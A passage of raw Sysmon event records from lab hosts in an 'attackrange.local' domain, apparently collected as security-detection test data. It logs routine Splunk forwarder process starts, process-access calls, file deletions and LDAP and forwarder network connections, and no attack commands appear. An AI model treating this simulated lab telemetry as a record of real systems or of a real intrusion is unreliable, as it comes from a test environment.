16:26:19.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060633Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060632Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-512B-6063-0C01-00000000AF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060631Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.887{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-512B-6063-0C01-00000000AF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060630Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.888{7F8C56E7-512B-6063-0C01-00000000AF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060629Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-512B-6063-0B01-00000000AF01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060628Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060627Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060626Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060625Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060624Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-512B-6063-0B01-00000000AF01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060623Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-512B-6063-0B01-00000000AF01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060622Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.217{7F8C56E7-512B-6063-0B01-00000000AF01}3236C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060621Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:19.215{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60B47B59BCAD6EAC1714853A6BABF2FD,SHA256=7A02F27615FE8ED7C2F7DCAAD144CA7DB7131A6E4CD741EA84A08B375FC843CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245206Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:19.890{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B23676B22EB0EC10306D2FA7DDB88824,SHA256=C02A0E8D5982DA63DD3BCD511341E3F1B0C79DBCCA21A62639EAB3E8E593BC74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245205Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:19.406{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27164C128CBBA3F5FA1B8B5EE5D5196F,SHA256=6FB672155F56E547E388C9F285CCAAF00A991922ED882565E3AE2E1BB7CC7251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245204Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:19.406{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAE606E129A6A18B5AABE9C606F85572,SHA256=4EEB2DDF4586BD1BBB3B28CD6D8B5BAFBEBB3B917187360FA5391D043EEC50E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245203Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:18.616{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64739-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060650Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1BB74AC574D90EEB116A53069C50E5A,SHA256=7B3E44F5C6745E5FA0173F90F2F5B7550DA1E17D75D5475E263325B22F4A7B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060649Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FC4F60C943B58E2454B1F18B99DECE,SHA256=9AE063921762178627BC78358316D5A617C953D4B101AB80974E7564EBA445D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060648Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-512C-6063-0D01-00000000AF01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060647Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060646Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060645Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060644Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060643Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-512C-6063-0D01-00000000AF01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060642Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.562{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-512C-6063-0D01-00000000AF01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060641Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.564{7F8C56E7-512C-6063-0D01-00000000AF01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001060640Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:17.830{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54751-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001060639Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:17.830{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54751-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 10341000x80000000000000001060638Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:26:20.015{7F8C56E7-512B-6063-0C01-00000000AF01}32562792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245220Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:26:20.968{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-512C-6063-9C22-00000000AF01}3552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245219Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 